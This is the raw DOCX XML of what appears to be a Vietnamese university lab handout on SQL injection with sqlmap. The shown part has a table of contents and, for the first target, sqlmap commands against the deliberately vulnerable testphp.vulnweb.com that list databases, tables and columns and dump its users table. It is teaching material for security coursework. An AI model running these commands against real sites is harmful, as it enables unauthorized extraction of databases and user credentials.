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9"/>
      </w:tblGrid>
      <w:tr w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w14:paraId="1BF8C63B" w14:textId="77777777" w:rsidTr="35A679DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1180" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B791A62" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe02"/>
            </w:pPr>
            <w:r w:rsidRPr="008A1FD0">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7965A32E" wp14:editId="4B320A3B">
                  <wp:extent cx="609600" cy="609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459" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="264B2E68" w14:textId="0A2A035B" w:rsidR="007E5344" w:rsidRDefault="007E5344" w:rsidP="35A679DD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Toc479091051"/>
            <w:r w:rsidRPr="008A1FD0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">THỰC HÀNH TẤN CÔNG </w:t>
            </w:r>
            <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>SQL INJECTION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="7FB7BFB7" w14:textId="50DF3AF0" w:rsidR="0075075D" w:rsidRPr="008A1FD0" w:rsidRDefault="0075075D" w:rsidP="35A679DD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Sử dụng </w:t>
            </w:r>
            <w:r w:rsidR="00B15533">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6868EA7E" w14:textId="653E0F94" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F" w:rsidP="008459D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31D992D6" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4D4688" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
        <w:ind w:firstLine="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t xml:space="preserve">Nhóm học phần:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597B5C3" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>1) Mã Sinh viên, Họ và Tên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4824B21C" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1C5D2" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EE77A" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F120650" w14:textId="5ABBA329" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe01"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-2036571086"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="3D694F36" w14:textId="783FE987" w:rsidR="005C68C9" w:rsidRDefault="0031173D">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r w:rsidRPr="008A1FD0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008A1FD0">
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008A1FD0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc175587842" w:history="1">
            <w:r w:rsidR="005C68C9" w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005C68C9" w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Giới thiệu</w:t>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587842 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005C68C9">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C109553" w14:textId="47B72E2A"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3" w:history="1">
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tấn công SQL Injection website testphp.vulnweb.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587843 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="733D484C" w14:textId="5F75F397"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4" w:history="1">
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tấn công SQL Injection website mytestsite.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587844 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="110B7FD4" w14:textId="4275160F"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5" w:history="1">
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tấn công SQL Injection website 192.168.1.140/dvwa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587845 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01339101" w14:textId="28C0C70C"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6" w:history="1">
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tấn công SQL Injection website abc.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587846 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="324E948D" w14:textId="0397732F"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7" w:history="1">
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Công cụ sqlmap GUI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587847 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BA5C01E" w14:textId="0D9283DF" w:rsidR="005C68C9" w:rsidRDefault="005C68C9">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75587848" w:history="1">
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003766BA">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Bài tập</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175587848 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31D4695A" w14:textId="70C7E42C" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="782"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9629"/>
            </w:tabs>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008A1FD0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="58A2E0E4" w14:textId="3F117F25" w:rsidR="007E5344" w:rsidRPr="008A1FD0" w:rsidRDefault="00F03A82" w:rsidP="69DCF625">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;&gt; Yêu cầu chụp hình ảnh là kết quả thực hành của SV. Không sử dụng lại hình ảnh của bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBE982" w14:textId="77777777" w:rsidR="00C66B15" w:rsidRDefault="007E5344" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc19092640"/>
      <w:bookmarkStart w:id="2" w:name="_Toc21091651"/>
      <w:bookmarkStart w:id="3" w:name="_Toc175587842"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Giới thiệu</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Toc19092641"/>
      <w:bookmarkStart w:id="5" w:name="_Toc175580488"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1D5DB898" w14:textId="37AF520F" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C951F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc175587843"/>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tấn công SQL Injection website testphp.vulnweb.com</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2F7F685A" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap.py –help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D302F6" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Lấy thông tin đăng nhập vào trang Web: http://testphp.vulnweb.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B256F08" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008F4F9C">
        <w:t xml:space="preserve">user@vmkali:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>sqlmap –u "http://testphp.vulnweb.com/search.php?test=query"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762173AC" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tìm tên cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F91A8" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008F4F9C">
        <w:t xml:space="preserve">user@vmkali:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001B783D">
        <w:t>sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963C3C0" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359A858" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>-u: là url của mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BFABB" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Tìm tên các bảng có trong cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EEABB3" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --tables -D acuart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DF514" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t>NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EFCE44" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:lastRenderedPageBreak/>
        <w:t>--tables để liệt kê tất cả các bảng có trong cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8E3E9" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00C66B15">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>-D là tên cơ sở dữ liệu cần liệt kê bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC605A" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Xác định tên các cột trong bảng user. Liệt kê các trường của bảng user trong CSDL acuart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569162A" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” --columns -D acuart -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B842F50" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">NOTE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6917D2AC" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">--columns để liệt kê ra các cột trong bảng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9FCAE" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">-D tên cơ sở dữ liệu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F8423" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:r w:rsidRPr="001B783D">
        <w:t xml:space="preserve">-T tên bảng cần liệt kê các cột </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D2641" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>Lấy các bản ghi của bảng users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D91690C" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="001B783D">
        <w:t>user@vmkali:~$ sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” --dump -D acuart -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E77DE9B" w14:textId="77777777" w:rsidR="00ED4EBB" w:rsidRPr="001B783D" w:rsidRDefault="00ED4EBB" w:rsidP="00ED4EBB">
